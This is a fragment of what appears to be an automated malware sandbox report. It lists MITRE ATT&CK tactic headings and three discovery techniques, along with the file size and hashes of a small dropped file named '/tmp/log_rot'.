Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit